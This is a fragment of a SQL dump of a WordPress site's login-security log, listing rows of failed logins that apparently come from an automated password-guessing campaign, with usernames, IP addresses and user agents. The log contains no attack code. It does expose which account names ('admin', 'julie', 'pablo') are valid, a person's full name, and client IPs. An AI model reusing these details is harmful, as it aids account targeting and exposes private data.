(99235, 1492764412.678026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99234, 1492764411.677851, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99233, 1492763119.773354, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656718336, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99232, 1492761735.360450, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1331015039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99231, 1492761461.931055, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99230, 1492761460.854856, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99229, 1492757744.483128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 93188037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99228, 1492757743.391426, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 93188037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99227, 1492757136.349958, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99226, 1492757134.701299, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99225, 1492756121.818400, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1897363733, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99224, 1492755643.529418, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976518279, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99223, 1492750803.789395, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831852610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99222, 1492750802.039759, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831852610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99221, 1492745504.121040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1311451404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99220, 1492742066.650724, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2807568394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99219, 1492736650.193385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2053535298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99218, 1492709582.323587, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18240054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99217, 1492684806.967400, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1950986834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99216, 1492684805.684274, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1950986834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99215, 1492682344.030197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1197448705, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99214, 1492671293.443205, 1, 'loginFailValidUsername', 'julie', 2, 1029390406, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99213, 1492668610.792176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3035750746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99212, 1492668608.989922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3035750746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99211, 1492654646.414558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3386632468, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99210, 1492654645.011105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3386632468, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99209, 1492654134.500495, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3070075726, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99208, 1492654132.924838, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3070075726, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99207, 1492653663.031151, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220923904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99206, 1492650339.890475, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 622367765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99205, 1492650338.838228, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 622367765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99204, 1492643055.377105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201216398, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99203, 1492643053.102978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201216398, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99202, 1492643000.343956, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981551954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99201, 1492641384.863504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3194237998, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99200, 1492641383.311538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3194237998, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99199, 1492639531.667778, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996157178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99198, 1492639530.595396, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996157178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99197, 1492638073.217084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419676188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99196, 1492638071.981529, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419676188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99195, 1492620972.879518, 1, 'loginFailValidUsername', 'admin', 1, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99194, 1492620972.173216, 1, 'loginFailValidUsername', 'pablo', 3, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99193, 1492620971.493874, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99192, 1492620970.799997, 1, 'loginFailValidUsername', 'julie', 2, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99191, 1492620970.035480, 1, 'loginFailValidUsername', 'julie', 2, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99190, 1492616065.567047, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449738601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99189, 1492616064.156860, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449738601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99188, 1492612091.152465, 1, 'loginFailInvalidUsername', 'test', 0, 1499985742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99187, 1492612089.952539, 1, 'loginFailInvalidUsername', 'test', 0, 1499985742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99186, 1492610940.298213, 1, 'loginFailInvalidUsername', 'test', 0, 3068061270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99185, 1492610938.728342, 1, 'loginFailInvalidUsername', 'test', 0, 3068061270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99184, 1492610579.205531, 1, 'loginFailInvalidUsername', 'test', 0, 2057770254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99183, 1492610208.848591, 1, 'loginFailInvalidUsername', 'test', 0, 3256756459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99182, 1492610207.832895, 1, 'loginFailInvalidUsername', 'test', 0, 3256756459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99181, 1492604886.313331, 1, 'loginFailInvalidUsername', 'test', 0, 2057397147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99180, 1492604697.734781, 1, 'loginFailInvalidUsername', 'test', 0, 1521773210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99179, 1492604696.710491, 1, 'loginFailInvalidUsername', 'test', 0, 1521773210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99178, 1492604252.354522, 1, 'loginFailInvalidUsername', 'test', 0, 1768847622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99177, 1492604251.254230, 1, 'loginFailInvalidUsername', 'test', 0, 1768847622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99176, 1492601366.942354, 1, 'loginFailInvalidUsername', 'test', 0, 1409309760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99175, 1492601365.894628, 1, 'loginFailInvalidUsername', 'test', 0, 1409309760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99174, 1492599755.777691, 1, 'loginFailInvalidUsername', 'test', 0, 694713201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99173, 1492598650.995087, 1, 'loginFailInvalidUsername', 'test', 0, 1600059475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99172, 1492598649.988922, 1, 'loginFailInvalidUsername', 'test', 0, 1600059475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99171, 1492586464.879751, 1, 'loginFailInvalidUsername', 'test', 0, 84708222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99170, 1492586463.864198, 1, 'loginFailInvalidUsername', 'test', 0, 84708222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99169, 1492583725.410448, 1, 'loginFailInvalidUsername', 'test', 0, 1892751844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99168, 1492583723.837621, 1, 'loginFailInvalidUsername', 'test', 0, 1892751844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99167, 1492580021.941367, 1, 'loginFailInvalidUsername', 'test', 0, 1166279070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99166, 1492580020.813723, 1, 'loginFailInvalidUsername', 'test', 0, 1166279070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99165, 1492565614.882942, 1, 'loginFailInvalidUsername', 'test', 0, 2087251461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99164, 1492565613.234615, 1, 'loginFailInvalidUsername', 'test', 0, 2087251461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99163, 1492565537.459727, 1, 'loginFailInvalidUsername', 'test', 0, 3568511730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99162, 1492565536.177324, 1, 'loginFailInvalidUsername', 'test', 0, 3568511730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99161, 1492562969.563425, 1, 'loginFailInvalidUsername', 'test', 0, 1899741878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99160, 1492562968.162481, 1, 'loginFailInvalidUsername', 'test', 0, 1899741878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99159, 1492552888.635325, 1, 'loginFailValidUsername', 'admin', 1, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99158, 1492552887.405652, 1, 'loginFailValidUsername', 'pablo', 3, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99157, 1492552886.180400, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99156, 1492552885.031010, 1, 'loginFailValidUsername', 'julie', 2, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99155, 1492552883.863416, 1, 'loginFailValidUsername', 'julie', 2, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99154, 1492547128.776596, 1, 'loginFailInvalidUsername', 'test', 0, 1502215624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99153, 1492545889.072292, 1, 'loginFailInvalidUsername', 'test', 0, 1549374632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99152, 1492545888.165373, 1, 'loginFailInvalidUsername', 'test', 0, 1549374632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99151, 1492544560.969375, 1, 'loginFailInvalidUsername', 'test', 0, 3125718184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99150, 1492544558.925440, 1, 'loginFailInvalidUsername', 'test', 0, 3125718184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99149, 1492542778.947516, 1, 'loginFailInvalidUsername', 'test', 0, 1517306635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99148, 1492539708.064405, 1, 'loginFailInvalidUsername', 'test', 0, 3562313397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99147, 1492539707.096774, 1, 'loginFailInvalidUsername', 'test', 0, 3562313397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99146, 1492539221.092013, 1, 'loginFailInvalidUsername', 'test', 0, 1239757070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99145, 1492539219.863786, 1, 'loginFailInvalidUsername', 'test', 0, 1239757070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99144, 1492535520.711749, 1, 'loginFailInvalidUsername', 'test', 0, 2107874202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99143, 1492535519.003612, 1, 'loginFailInvalidUsername', 'test', 0, 2107874202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99142, 1492532209.085579, 1, 'loginFailInvalidUsername', 'test', 0, 403351805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99141, 1492532207.498185, 1, 'loginFailInvalidUsername', 'test', 0, 403351805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99140, 1492531287.689916, 1, 'loginFailInvalidUsername', 'test', 0, 1451447487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99139, 1492531286.689239, 1, 'loginFailInvalidUsername', 'test', 0, 1451447487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99138, 1492530857.396287, 1, 'loginFailInvalidUsername', 'test', 0, 1768719138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99137, 1492530855.942459, 1, 'loginFailInvalidUsername', 'test', 0, 1768719138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99136, 1492530368.461646, 1, 'loginFailInvalidUsername', 'test', 0, 1486037620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99135, 1492530367.418167, 1, 'loginFailInvalidUsername', 'test', 0, 1486037620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99134, 1492529849.793484, 1, 'loginFailInvalidUsername', 'test', 0, 1489990836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99133, 1492529848.136261, 1, 'loginFailInvalidUsername', 'test', 0, 1489990836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99132, 1492527552.574550, 1, 'loginFailInvalidUsername', 'test', 0, 1497816116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99131, 1492527551.592321, 1, 'loginFailInvalidUsername', 'test', 0, 1497816116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99130, 1492522130.593612, 1, 'loginFailInvalidUsername', 'test', 0, 2092795747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99129, 1492522128.426983, 1, 'loginFailInvalidUsername', 'test', 0, 2092795747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99128, 1492522062.306191, 1, 'loginFailInvalidUsername', 'test', 0, 3136602829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99127, 1492522060.229487, 1, 'loginFailInvalidUsername', 'test', 0, 3136602829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99126, 1492522029.704479, 1, 'loginFailInvalidUsername', 'test', 0, 1380787961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99125, 1492519603.776930, 1, 'loginFailInvalidUsername', 'test', 0, 1309739612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99124, 1492519602.782323, 1, 'loginFailInvalidUsername', 'test', 0, 1309739612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99123, 1492516917.809426, 1, 'loginFailInvalidUsername', 'test', 0, 2016972209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99122, 1492516916.347205, 1, 'loginFailInvalidUsername', 'test', 0, 2016972209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99121, 1492516701.068504, 1, 'loginFailInvalidUsername', 'test', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99120, 1492516700.049807, 1, 'loginFailInvalidUsername', 'test', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99119, 1492515659.237410, 1, 'loginFailInvalidUsername', 'test', 0, 2630122612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99118, 1492515658.082606, 1, 'loginFailInvalidUsername', 'test', 0, 2630122612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99117, 1492513597.315137, 1, 'loginFailInvalidUsername', 'test', 0, 2545299691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99116, 1492513596.236424, 1, 'loginFailInvalidUsername', 'test', 0, 2545299691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99115, 1492512325.945787, 1, 'loginFailInvalidUsername', 'test', 0, 1590215498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99114, 1492512324.723103, 1, 'loginFailInvalidUsername', 'test', 0, 1590215498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99113, 1492511910.365321, 1, 'loginFailInvalidUsername', 'test', 0, 2177341263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99112, 1492511909.372978, 1, 'loginFailInvalidUsername', 'test', 0, 2177341263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99111, 1492510036.190102, 1, 'loginFailInvalidUsername', 'test', 0, 2076790141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99110, 1492510034.743730, 1, 'loginFailInvalidUsername', 'test', 0, 2076790141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99109, 1492509217.386934, 1, 'loginFailInvalidUsername', 'test', 0, 3134553032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99108, 1492509215.594833, 1, 'loginFailInvalidUsername', 'test', 0, 3134553032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99107, 1492508703.398315, 1, 'loginFailInvalidUsername', 'test', 0, 608327268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99106, 1492508701.503904, 1, 'loginFailInvalidUsername', 'test', 0, 608327268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99105, 1492507176.146862, 1, 'loginFailInvalidUsername', 'test', 0, 703648184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99104, 1492507173.464063, 1, 'loginFailInvalidUsername', 'test', 0, 703648184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99103, 1492505476.460571, 1, 'loginFailInvalidUsername', 'test', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99102, 1492505475.473139, 1, 'loginFailInvalidUsername', 'test', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99101, 1492501644.182625, 1, 'loginFailInvalidUsername', 'test', 0, 2047013389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99100, 1492501642.544780, 1, 'loginFailInvalidUsername', 'test', 0, 2047013389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99099, 1492500592.336273, 1, 'loginFailInvalidUsername', 'test', 0, 36865490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99098, 1492500591.202169, 1, 'loginFailInvalidUsername', 'test', 0, 36865490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99097, 1492500055.658160, 1, 'loginFailInvalidUsername', 'test', 0, 831606952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99096, 1492500053.847071, 1, 'loginFailInvalidUsername', 'test', 0, 831606952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99095, 1492498022.173032, 1, 'loginFailInvalidUsername', 'test', 0, 2047060457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99094, 1492498020.280174, 1, 'loginFailInvalidUsername', 'test', 0, 2047060457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99093, 1492485165.548061, 1, 'loginFailInvalidUsername', 'test', 0, 2630018511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99092, 1492485164.332387, 1, 'loginFailInvalidUsername', 'test', 0, 2630018511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99091, 1492483806.887193, 1, 'loginFailInvalidUsername', 'test', 0, 2082369434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99090, 1492483805.619584, 1, 'loginFailInvalidUsername', 'test', 0, 2082369434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99089, 1492482546.793912, 1, 'loginFailInvalidUsername', 'test', 0, 1825994579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
